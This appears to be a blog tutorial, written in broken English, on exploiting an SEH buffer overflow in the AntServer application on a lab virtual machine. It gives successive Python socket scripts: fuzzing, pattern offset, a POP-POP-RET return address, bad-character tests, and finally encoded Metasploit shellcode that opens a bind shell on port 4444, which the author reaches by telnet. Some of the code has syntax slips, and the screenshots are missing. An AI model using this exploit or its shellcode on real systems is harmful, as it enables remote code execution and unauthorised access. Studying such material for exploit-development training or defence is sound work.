First :
1. Download aplikasi antserver and install in virtualBox us.
2. Make fuzzer for run Antserver in OllyDBG.
Example Fuzzer.
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV " +"\x41" * 2500 "\r\n\r\n"
sock=socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
3. If you had maked fuzzer in terminal on backtrack, and open application Antserver, next open OllyDBG chose file and clik attack + klik Antsever + klik run in OllyDBG after that run fuzzer your maked.
example image if application run.
4. after performing the image of the fuzzer next wewill try to see if overwrite EIP address. Okay
we will look at the command click view and selectSEH chain
example image
5. After that press shif + F9 to display theFPU EIP 41,414,141
example image.
6. let's see the data in the buffer memory by right clicking on the stack + follow in dumb.
example image :
7. then we are looking for a stepping stone in which there is POP, POP and RETN. However,
there are some over there before we have to consider the following:
>. used for the applications up and running which will use as a springboard. command to
see whoused the premises to view click + executable modules.
example image
>. Copy Vbajet32.dll to sistem backtrack for the next analisis, after that copying use write the
command
# ./msfpescan -i /tmp/vbajet32.dll | grep SEHandler
# ./msfpescan -i /tmp/vbajet32.dll | grep DllCharacteristics
example image :
for + sequence of command.
example image :
find.
example image :
>. Vjabet32.dll find address memory.
Example image:
# pattern_create.rb 2500
example image :
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV " buffer+="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D"+"\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
9. run fuzzer who your edited
example image :
example image :
11. Next write command ./pattren_offset.rb 42326742 for cek values register EIP
example image :
12. Next edit Fuzzer
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV "
buffer+="\x90" * 962
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x41\x41\x41\x41
buffer+="\x90" * (2504-len(buffer))
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
example image from fuzzer in the top.
example fuzzer
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV "
buffer+="\x90" * 962
buffer+="\xcc\xcc\xcc\xcc"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90" * (2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
example image:
image same fuzzer before and see seh chain clik view and choose seh chain.
example image :
on memory
example image :
open msfweb and example image
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90" * 16
buffer+="\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11"
buffer+="\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
buffer+="\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
buffer+="\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e"
buffer+="\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d"
buffer+="\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c"
buffer+="\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b"
buffer+="\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a"
buffer+="\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89"
buffer+="\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
buffer+="\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7"
buffer+="\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6"
buffer+="\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5"
buffer+="\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4"
buffer+="\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3"
buffer+="\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2"
buffer+="\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
buffer+="\x90" * (2500-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
example image from fuzzer :
example search badcrakter :
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90" * 16
buffer+="\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11"
buffer+="\x90" * (2500-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
the result from fuzzer :
turns in the first payload codeno badkarakter
oke am find badcrakter in line 2 \x20, line 3 \x2f,\x25, line 4 \x30 and I back in msfweb too search payloads but in Restricted Character I am Writing 0x00 0x0a 0x0d 0x20 0x2f 0x25 0x30 next am clik Generate and I am copying the source code payloads to fuzzer.
This code fuzzer:
#!/usr/bin/python
import socket
target_address="192.168.43.128"
target_port=6660
buffer= "USV "
buffer+="\x90" * 962
buffer+="\xeb\x06\x90\x90"
buffer+="\x6A\x19\x9A\x0F"
buffer+="\x90" * 16
buffer+=("\xda\xdb\xbe\xf9\xf2\x90\x35\xd9\x74\x24\xf4\x29\xc9\x5a\xb1\x51"
"\x31\x72\x17\x83\xc2\x04\x03\x8b\xe1\x72\xc0\x97\x6c\x98\x66\x8f"
"\x88\xa1\x86\xb0\x0b\xd5\x15\x6a\xe8\x62\xa0\x4e\x7b\x08\x2e\xd6"
"\x7a\x1e\xbb\x69\x65\x6b\xe3\x55\x94\x80\x55\x1e\xa2\xdd\x67\xce"
"\xfa\x21\xfe\xa2\x79\x61\x75\xbd\x40\xa8\x7b\xc0\x80\xc6\x70\xf9"
"\x50\x3d\x51\x88\xbd\xb6\xfe\x56\x3f\x22\x66\x1d\x33\xff\xec\x7e"
"\x50\xfe\x19\x83\x44\x8b\x57\xef\xb0\x97\x06\x2c\x89\x7c\xac\x39"
"\xa9\xb2\xa6\x7d\x22\x38\xc8\x61\x97\xb5\x69\x91\xb9\xa1\xe7\xef"
"\x4b\xde\xa8\x10\x85\x78\x1a\x88\x42\xb6\xae\x3c\xe4\xcb\xfc\xe3"
"\x5e\xd3\xd1\x73\x94\xc6\x2e\xb8\x7a\xe6\x19\xe1\xf3\xfd\xc0\x9c"
"\xe9\xf6\x0e\xcb\x9b\x04\xf0\x23\x33\xd0\x07\x36\x69\xb5\xe8\x6e"
"\x21\x69\x44\xdd\x95\xce\x39\xa2\x4a\x2e\x6d\x42\x05\xc1\xd2\xec"
"\x86\x68\x0b\x65\x40\xcf\xd6\xf5\x56\x58\x18\x23\x32\x77\xb7\x9e"
"\x3c\xa7\x5f\x84\x6e\x66\x49\x93\x8f\xa1\xda\x4e\x8f\x9e\xb5\x95"
"\x26\x99\x0f\x02\x46\x73\xdf\xf8\xec\x29\x1f\xd0\x9e\xba\x38\xa9"
"\x66\x43\x90\xb6\xb1\xe1\xe1\x98\x58\x60\x7a\x7e\xcd\x17\xef\xf7"
"\xe8\xb2\xbf\x5e\xda\x8e\xc9\x87\x76\x4b\x43\xa5\xb6\x93\xa0\x83"
"\x47\x51\x6a\x2d\xf5\x7a\xe7\x5c\x80\xba\xac\xf5\xde\xd3\xc0\xf7"
"\x92\x32\xda\x72\x91\xc5\xf2\x27\x4e\x68\xaa\x86\x21\xe6\x4d\x79"
"\x93\xa3\x1c\x86\xc3\x24\x32\xa1\xe1\x7a\x1f\xae\x3c\xe8\x5f\xaf"
"\xf6\x12\x4f\xc4\xae\x10\xf3\x1e\x34\x16\x22\xcc\x4a\x38\xa3\x8e"
"\x6c\x5b\x47\x3d\x72\x4a\x57\x11")
buffer+="\x90" * (2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
example image bellow :
This generate badchacter
This source code copying in fuzzer
This result from payloads wiht command telnet 192.168.43.128 4444
The result command show file from windows with command dir.
TRYING HARD TO ACHIEVE GOALS
Tidak ada komentar:
Posting Komentar